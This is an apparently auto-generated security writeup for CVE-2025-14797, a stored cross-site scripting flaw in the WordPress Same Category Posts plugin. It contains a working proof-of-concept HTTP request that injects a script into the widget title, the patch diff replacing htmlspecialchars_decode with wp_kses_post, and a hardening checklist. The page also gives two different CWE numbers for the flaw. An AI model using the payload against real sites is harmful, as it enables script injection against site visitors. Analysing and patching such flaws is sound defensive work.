ANALYSIS · 745b8935· FINISHED 2026-01-24 · PATCHDIFF

Folder Analysiscache/same-category-posts_1.1.19 → cache/same-category-posts_1.1.20✓ COMPLETED

Files1

Vulnerable1

True positives0

CVE matched1

1 CVE article ready PatchLeaks generated full security writeups for the matched CVEs · one per CVE, with affected files linked

CVE-2025-14797

FILTERS 0

SEARCH

STATUS

JUDGE

CVE MATCH

EXTENSION

CWE

OPTIONS

Hide “No vulnerability” Hide unjudged

SCOPE

All 1 CVE 1 Vuln 1

SORT

1 files · page 1/1

same-category-posts.php

AI: 1 vulnerabilities

CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) CVE-2025-14797 1 FP

#%!d(float64=001)

1–1 of 1

⌖

Select a file from the list to inspect its diff and AI analysis.

↑ ↓ to navigate

CVES 1

CVE-2025-14797

Security writeup for CVE-2025-14797

✓ 1 FILE

## The Exploit

Authenticated attacker needs Author-level access to the WordPress admin area and the ability to update the Same Category Posts widget settings.

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example
Cookie: wordpress_logged_in_abc123=...; wordpress_test_cookie=WP+Cookie+check
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://target.example/wp-admin/widgets.php

action=update-widget&
widget-id=same-category-posts-2&
sidebar=sidebar-1&
_wpnonce=PLACEHOLDER_NONCE&
widget-same-category-posts[2][title]=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E
```

```http
GET / HTTP/1.1
Host: target.example
Cookie: wordpress_test_cookie=WP+Cookie+check
Accept: text/html
```

The POST stores the malicious widget title payload in the Same Category Posts widget settings. The subsequent GET renders the front-end page and returns HTML containing the raw injected script, e.g. `...<script>alert('xss')</script>...`, which executes in any visitor’s browser.

## What the Patch Did

Before:
```php
echo htmlspecialchars_decode(apply_filters('widget_title',$linkList));
echo htmlspecialchars_decode(apply_filters('widget_title',$categoryNames));
$ret = $before_title . htmlspecialchars_decode(apply_filters('widget_title',isset($val['title'])?$val['title']:"")) . $after_title;
```

After:
```php
echo wp_kses_post(apply_filters('widget_title',$linkList));
echo wp_kses_post(apply_filters('widget_title',$categoryNames));
$ret = $before_title . wp_kses_post(apply_filters('widget_title',isset($val['title'])?$val['title']:"")) . $after_title;
```

The patch replaces unsafe output decoding with `wp_kses_post()`, a WordPress output sanitization function that strips disallowed HTML while preserving safe markup. This changes the security control from “decode entities and print raw HTML” to “sanitize HTML before rendering”.

## Root Cause

This is CWE-79: Stored Cross-Site Scripting. The dataflow begins with attacker-controlled widget configuration, specifically `widget-same-category-posts[2][title]` from the widget update request. That value reaches the widget rendering logic inside `same-category-posts.php`, where it is passed through `apply_filters('widget_title', ...)` and then fed into `htmlspecialchars_decode()`. The unsafe sink is the direct echo of the decoded string into page output, crossing the trust boundary from admin-supplied widget settings into the browser without proper escaping.

## Why It Works

The single load-bearing change is the replacement of `htmlspecialchars_decode(...)` with `wp_kses_post(...)`. If the plugin still decoded HTML entities, any malicious title or taxonomy-derived string could reconstitute `<script>` or other executable markup in the rendered widget. The patch fixes the output encoding at the sink, which is where the vulnerability actually occurs. The other changed lines are the same fix applied to each separate widget title output path: one for `$linkList`, one for `$categoryNames`, and one for the actual widget title placeholder stored in `$val['title']`.

## Why this still matters at admin

Even though the attack requires authenticated access, Author-level accounts are common on WordPress blogs and editorial sites. A compromised author session, stolen credentials, or a malicious author can plant a widget payload that executes for every visitor to pages using the Same Category Posts widget. That turns a seemingly low-privilege account into a site-wide browser compromise.

## Hardening Checklist

- Escape widget output with `wp_kses_post()` or `esc_html()` before echoing it, especially for values passed through `apply_filters('widget_title', ...)`.
- Never call `htmlspecialchars_decode()` on untrusted data before rendering; it undoes HTML escaping.
- Sanitize widget settings on save with `sanitize_text_field()` if HTML is not required in widget titles.
- Treat taxonomy term names as untrusted data and sanitize them at output, not just at input.
- Keep widget rendering logic consistent: sanitize every title/path that is printed, including category name placeholders and generated link lists.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2025-14797

CVE CVE-2025-14797

PRODUCT Folder Analysis

AFFECTED ≤ cache/same-category-posts_1.1.19

FIXED IN cache/same-category-posts_1.1.20

STATUS Generated

Security writeup · CVE-2025-14797

Source files · 1

same-category-posts.php Linked

↗ NVD